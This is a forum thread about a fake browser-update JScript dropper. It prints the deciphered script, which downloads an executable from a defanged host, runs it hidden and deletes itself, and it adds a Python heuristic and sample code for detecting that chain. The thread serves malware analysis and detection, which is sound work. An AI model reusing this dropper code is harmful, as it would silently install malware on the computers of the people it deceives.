
Topic: Can somebody decipher this?

Das
sr. member
Activity: 308
Merit: 250
August 11, 2016, 11:12:41 AM
#3
Does that mean someone is trying to hack into people's computers by asking them to download free browsers?

Wow, there is a real need for caution nowadays.
hero member
Activity: 955
Merit: 500
August 10, 2016, 11:25:29 PM
#2
In case anybody is interested, I posted it on another site and somebody cracked it.

http://www.bleepingcomputer.com/forums/t/622929/why-are-antivirus-programs-so-slow-to-flag-malware/

The deciphered script, with XXXXX added, from the above gibberish is:

Quote
try {
    a = new ActiveXObject("Wscript.Shell");
    b = new ActiveXObject("Scripting.FileSystemObject");
    c = new ActiveXObject("MSXML2.XMLHTTP");
    d = new ActiveXObject("ADODB.Stream");
    url = "https:/XXXXX/feipinofa .netXXXXX/10/524.dat";
    fname = b.GetSpecialFolder(2) + String.fromCharCode(92) + "12345.exe";
    for (var i = 1; i <= 5; i++) {
        try {
            c.open("GET", url, false);
            c.send(null);
            break;
        } catch (e) {
            WScript.Sleep(5000);
        }
    }
    d.Open;
    d.Type = 1;
    d.Write(c.ResponseBody);
    d.Position = 0;
    if (b.Fileexists(fname)) b.DeleteFile(fname);
    d.SaveToFile(fname);
    a.run("cmd.exe /c " + String.fromCharCode(34) + fname + String.fromCharCode(34), 0, false);
    var p = WScript.ScriptFullName;
    if (b.FileExists(p)) b.DeleteFile(p);
    WScript.Echo("Update complete.");
} catch (e) {}
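As an added example (not code from the thread or from the cracked sample), here is a small Python heuristic that flags the fetch-save-execute chain the deciphered script above relies on: an XMLHTTP download written to disk through ADODB.Stream and then launched with WScript.Shell. The two sample scripts inside it are constructed for the test; the dropper sample mirrors the quoted code, the other is an ordinary WSH script that only uses WScript.Shell.

```python
import re

# Indicators taken from the deciphered dropper above. Each value is a
# case-insensitive regex; the key is the label used in the report.
INDICATORS = {
    "shell":    r'ActiveXObject\(\s*["\']WScript\.Shell["\']',
    "fso":      r'ActiveXObject\(\s*["\']Scripting\.FileSystemObject["\']',
    "http":     r'ActiveXObject\(\s*["\']MSXML2\.(Server)?XMLHTTP',
    "stream":   r'ActiveXObject\(\s*["\']ADODB\.Stream["\']',
    "temp_dir": r'GetSpecialFolder\(\s*2\s*\)',      # %TEMP% as drop location
    "save":     r'\.SaveToFile\(',
    "exec":     r'\.run\(\s*["\']cmd\.exe',
    "self_del": r'ScriptFullName',                    # script deletes itself
    "charcode": r'String\.fromCharCode\(\s*\d+\s*\)', # hides quotes/backslash
}

# Any single indicator is common in legitimate WSH scripts; the chain
# download -> write to disk -> run is what makes this a dropper.
DROPPER_CHAIN = {"http", "stream", "save", "exec"}

def score_jscript(src: str) -> dict:
    """Return which indicators appear and whether the full dropper chain is present."""
    hits = {name for name, pat in INDICATORS.items() if re.search(pat, src, re.I)}
    return {"hits": sorted(hits), "dropper_chain": DROPPER_CHAIN <= hits}

# Constructed sample: shape of the deciphered fake-browser-update script.
DROPPER_SAMPLE = r'''
a = new ActiveXObject("Wscript.Shell");
b = new ActiveXObject("Scripting.FileSystemObject");
c = new ActiveXObject("MSXML2.XMLHTTP");
d = new ActiveXObject("ADODB.Stream");
fname = b.GetSpecialFolder(2) + String.fromCharCode(92) + "12345.exe";
c.open("GET", url, false); c.send(null);
d.Open; d.Type = 1; d.Write(c.ResponseBody); d.SaveToFile(fname);
a.run("cmd.exe /c " + String.fromCharCode(34) + fname + String.fromCharCode(34), 0, false);
if (b.FileExists(WScript.ScriptFullName)) b.DeleteFile(WScript.ScriptFullName);
'''

# Constructed sample: a benign logon-style script that only launches a program.
BENIGN_SAMPLE = r'''
var sh = new ActiveXObject("WScript.Shell");
sh.Run("notepad.exe");
'''

if __name__ == "__main__":
    for label, sample in (("dropper", DROPPER_SAMPLE), ("benign", BENIGN_SAMPLE)):
        print(label, score_jscript(sample))
```

The heuristic only looks at de-obfuscated text, so it belongs after the unscrambling step, not on the raw gibberish posted in #1.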
hero member
Activity: 955
Merit: 500
August 09, 2016, 10:52:54 PM
#1
There are a lot of fake browser update sites. Usually I download the script and go to the URL and forward the malicious stuff to VirusTotal to see how long various antivirus sites take to detect it. This script, though, is written in gibberish that doesn't seem to have a URL.

All the ZZZZZs are added to break links

It came from https://feipinofa.nZZZZZet/4231654327224/1470796620751580/fireZZZZZfox-patch.js
to which I was maliciously redirected from
http://www.newser.com/story/229406/subway-employee-accused-of-drugging-officers-drink.html
or
http://www.wistv.com/story/32721957/sandwich-chain-worker-accused-of-drugging-officers-drink

The script is as follows; can you decipher it? Warning: it has something malicious that no antivirus detects yet.

The symbol [ is replaced by ZZZZZ

Right now it scores 0/54 on virustotal https://www.virustotal.com/en/file/0a5cdd5b40d88ded4a3783a7ed89148a13bdc3351a9a67cb2b78cd39bab408f3/analysis/1470797839/

In a few days it will score 5 or 10 / 54

In a week or two 20 or 30 / 54